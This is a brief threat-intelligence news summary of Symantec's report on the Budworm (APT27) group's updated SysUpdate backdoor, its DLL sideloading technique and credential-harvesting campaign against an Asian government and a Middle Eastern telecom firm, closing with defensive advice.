The Budworm APT group is evolving its cyber arsenal. In the latest discovery, Symantec’s Threat Hunter Team identified that Budworm has adapted and upgraded one of its primary tools. Two significant entities, an Asian government and a Middle Eastern telecommunication firm, were targeted with this renewed strategy.
Diving into the Details
- In August 2023, Budworm, also known as LuckyMouse, Emissary Panda, and APT27, launched an attack deploying an updated SysUpdate backdoor – SysUpdate DLL inicore_v2.3.30.dll.
- The group combined this with a mix of custom malware, along with several living-off-the-land and publicly available tools.
- The primary aim of the attackers was credential harvesting.
Analyzing the Arsenal
- Budworm’s signature technique consists of executing SysUpdate on victims’ networks by sideloading the DLL payload using the authentic INISafeWebSSO application – a tactic it has employed since at least 2018.
- SysUpdate is a multifaceted backdoor with capabilities ranging from file management and command execution to taking screenshots and browsing processes.
- The group, furthermore, employed legitimate tools such as AdFind, Curl, SecretsDump, and PasswordDumper in its recent campaign, emphasizing its methodological approach to attacks, blending malicious tools with legitimate ones to avoid suspicion.
Why this matters
- Tracing back to 2013, Budworm’s endeavors have primarily targeted entities in defense, government, and technology sectors, particularly in Southeast Asia, the Middle East, and the U.S.
- APT27’s victim profile, such as the recent targeting of an Asian government and a Middle Eastern telecom firm, aligns with its intelligence-gathering objectives.
- The latest version of SysUpdate affirms the group’s ongoing toolset development.
The bottom line
Organizations should proactively update and patch their systems to counter known vulnerabilities exploited by tools like SysUpdate. Advanced threat intelligence and monitoring solutions can help identify and counteract unusual activity, especially those associated with known threat actors such as Budworm.